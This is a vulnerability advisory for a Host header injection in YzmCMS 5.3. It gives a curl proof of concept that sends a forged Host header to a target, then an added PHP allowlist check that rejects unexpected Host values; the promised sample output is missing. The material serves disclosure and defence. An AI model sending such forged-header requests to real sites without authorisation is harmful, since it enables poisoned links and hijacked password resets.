# Exploit Title: YzmCMS 5.3 - 'Host' Header Injection
# Exploit Author: Debashis Pal
# Vendor Homepage: http://www.yzmcms.com/
# Source: https://github.com/yzmcms/yzmcms
# Version: YzmCMS V5.3
# CVE : N/A
# Tested on: Windows 7 SP1(64bit),XAMPP: 7.3.9

#About YzmCMS
==============
YzmCMS is a lightweight open source content management system that uses OOP (Object Oriented) to develop its own framework.

#Vulnerability
===============
Host Header Injection.

#PoC
=====
#YzmCMS V5.3 Access Path: TARGET/yzmcms/

curl http://TARGET/yzmcms/ -H "Host: www.google.com"

//sample output start
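
A mitigation for the behaviour the PoC above probes is to accept only the hostnames the site is actually served under and reject every other Host value before the application uses it. The following is an added example, not part of the original advisory and not YzmCMS code; the hostnames in ALLOWED_HOSTS and all function names are assumptions chosen for illustration.

```php
<?php
// Added example, not YzmCMS code. The hostnames are placeholders (assumption):
// replace them with the names the site is actually served under.
const ALLOWED_HOSTS = ['cms.example.test', 'www.cms.example.test'];

// Reduce a raw Host header to a bare lowercase hostname, or null if malformed.
function normalise_host(?string $raw): ?string
{
    if ($raw === null) {
        return null;
    }
    // Hostname labels plus an optional :port; rejects spaces, slashes, '@',
    // commas (merged duplicate headers) and anything else unexpected.
    if (!preg_match('/^([a-z0-9.-]{1,253})(?::\d{1,5})?$/D', strtolower($raw), $m)) {
        return null;
    }
    $name = rtrim($m[1], '.');          // "example.test." equals "example.test"
    return $name === '' ? null : $name;
}

// True only when the header names one of the configured hosts exactly.
function host_is_allowed(?string $raw, array $allowed = ALLOWED_HOSTS): bool
{
    $name = normalise_host($raw);
    return $name !== null && in_array($name, $allowed, true);
}

// Call before any code builds URLs, redirects or e-mail links from the host.
function enforce_allowed_host(): void
{
    if (!host_is_allowed($_SERVER['HTTP_HOST'] ?? null)) {
        http_response_code(400);
        header('Content-Type: text/plain; charset=utf-8');
        exit("Bad Request: unrecognised Host header\n");
    }
}

if (PHP_SAPI === 'cli') {
    // Constructed sample values, including the one sent by the PoC.
    $samples = ['cms.example.test', 'CMS.example.test:8080', 'cms.example.test.',
                'www.google.com', 'cms.example.test@www.google.com', '', null];
    foreach ($samples as $h) {
        printf("%-34s %s\n", var_export($h, true), host_is_allowed($h) ? 'allow' : 'reject');
    }
} else {
    enforce_allowed_host();
}
```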